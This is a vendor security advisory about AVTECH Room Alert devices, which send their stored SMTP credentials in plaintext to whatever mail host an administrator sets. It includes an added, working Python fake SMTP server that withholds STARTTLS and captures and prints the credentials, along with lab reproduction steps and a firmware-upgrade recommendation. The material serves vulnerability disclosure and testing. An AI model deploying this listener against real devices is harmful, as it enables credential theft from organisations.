Knowledge Base / Security Advisories
Impacted Devices and Firmware:
Summary:
Changing the mail server host configured on the device lets an attacker obtain the stored SMTP credentials in plaintext through a credential pass-back attack.
Description:
An individual with administrative access can change the mail server host configured on the device. An attacker who has obtained administrative access can therefore point the mail server setting at an attacker-controlled IP address while the previously configured SMTP credentials remain stored on the device. When the device next attempts to authenticate to the mail server, it sends those credentials in plaintext to the attacker's host.
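The pass-back described above, as an added example that is not AVTECH's code: a minimal SMTP listener an assessor would run on the attacker-controlled host to confirm exactly what a device hands over once its mail server host is changed. It assumes the device authenticates with standard SMTP AUTH PLAIN or AUTH LOGIN over a plain (non-TLS) connection; the hostname, listening port 2525 and the credentials in the sample dialogs are constructed for the example and do not come from any real device.

```python
import base64
import socketserver


def _b64(text):
    return base64.b64encode(text.encode()).decode()


def _unb64(text):
    return base64.b64decode(text.strip()).decode(errors="replace")


class SmtpCredentialCapture:
    """State machine for one SMTP session. It advertises AUTH PLAIN and AUTH
    LOGIN, never offers STARTTLS, and records the credentials the client sends
    in the clear. Responses are returned as strings without CRLF."""

    def __init__(self, hostname="mail.example.invalid"):  # hostname is made up
        self.hostname = hostname
        self.captured = []      # list of (username, password) tuples
        self._state = None      # None | "plain" | "login_user" | "login_pass"
        self._login_user = None

    def greeting(self):
        return "220 %s ESMTP ready" % self.hostname

    def _record_plain(self, blob):
        # RFC 4616: base64("authzid\0authcid\0passwd"); authzid may be empty.
        parts = _unb64(blob).split("\x00")
        if len(parts) == 3:
            self.captured.append((parts[1], parts[2]))
        elif len(parts) == 2:
            self.captured.append((parts[0], parts[1]))
        else:
            return "501 5.5.2 Cannot decode AUTH PLAIN response"
        return "235 2.7.0 Authentication successful"

    def handle_line(self, line):
        """Consume one client line and return the server's response lines."""
        cmd = line.rstrip("\r\n")
        if self._state == "plain":                 # blob sent on its own line
            self._state = None
            return [self._record_plain(cmd)]
        if self._state == "login_user":
            self._login_user = _unb64(cmd)
            self._state = "login_pass"
            return ["334 " + _b64("Password:")]
        if self._state == "login_pass":
            self.captured.append((self._login_user, _unb64(cmd)))
            self._state = None
            return ["235 2.7.0 Authentication successful"]

        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            # No STARTTLS in the capability list: keep the client in the clear.
            return ["250-" + self.hostname, "250-AUTH PLAIN LOGIN", "250 8BITMIME"]
        if verb == "AUTH":
            mech, _, initial = arg.partition(" ")
            if mech.upper() == "PLAIN":
                if initial:                         # initial response on AUTH line
                    return [self._record_plain(initial)]
                self._state = "plain"
                return ["334 "]
            if mech.upper() == "LOGIN":
                self._state = "login_user"
                return ["334 " + _b64("Username:")]
            return ["504 5.5.4 Unrecognized authentication type"]
        if verb == "QUIT":
            return ["221 2.0.0 Bye"]
        return ["250 2.0.0 OK"]                     # keep talking; never relay mail


def run_dialog(client_lines):
    """Drive one session from a list of client lines; return (responses, captured)."""
    session = SmtpCredentialCapture()
    responses = [session.greeting()]
    for line in client_lines:
        responses.extend(session.handle_line(line))
    return responses, session.captured


class _Handler(socketserver.StreamRequestHandler):
    def handle(self):
        session = SmtpCredentialCapture()
        self.wfile.write((session.greeting() + "\r\n").encode())
        while True:
            raw = self.rfile.readline()
            if not raw:
                break
            line = raw.decode(errors="replace")
            for reply in session.handle_line(line):
                self.wfile.write((reply + "\r\n").encode())
            if line.upper().startswith("QUIT"):
                break
        for user, password in session.captured:
            print("captured from %s: %r / %r" % (self.client_address[0], user, password))


def serve(host="0.0.0.0", port=2525):
    """Listen for a device whose mail server host has been pointed at this machine."""
    with socketserver.ThreadingTCPServer((host, port), _Handler) as srv:
        srv.serve_forever()


# Constructed sample dialogs with hypothetical credentials.
SAMPLE_AUTH_PLAIN = [
    "EHLO roomalert",
    "AUTH PLAIN " + _b64("\x00alerts@example.invalid\x00Winter2024!"),
    "QUIT",
]
SAMPLE_AUTH_LOGIN = [
    "EHLO roomalert",
    "AUTH LOGIN",
    _b64("alerts@example.invalid"),
    _b64("Winter2024!"),
    "QUIT",
]

if __name__ == "__main__":
    print(run_dialog(SAMPLE_AUTH_PLAIN)[1], run_dialog(SAMPLE_AUTH_LOGIN)[1])
```

To reproduce against a lab device, run `serve()` on a host the device can reach, set that host (and port) as the device's mail server, and trigger a test notification; the captured username and password are printed as the session ends. A client that refuses to authenticate because STARTTLS is not offered is itself a useful result, since it means the credentials did not cross the wire in the clear.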
Recommendation:
For S-models, upgrade to firmware 1.10.4 or higher, which requires the SMTP credentials to be re-entered whenever the mail server host is changed. Regardless of model, AVTECH strongly recommends setting custom administrative credentials on the device to restrict access to all settings, including the SMTP settings. For E-models, use Room Alert Account or Room Alert Manager, where possible, to send email notifications instead of sending them directly from the device. If the device is not used to send email, ensure that any SMTP credentials have been removed from it.
| Current S models | Current E models |
|---|---|
| Room Alert 32S | Room Alert 32E |
| Room Alert 12S | Room Alert 12E |
| Room Alert 3S | Room Alert 4E |
| | Room Alert 3E |
| | Room Alert 3W |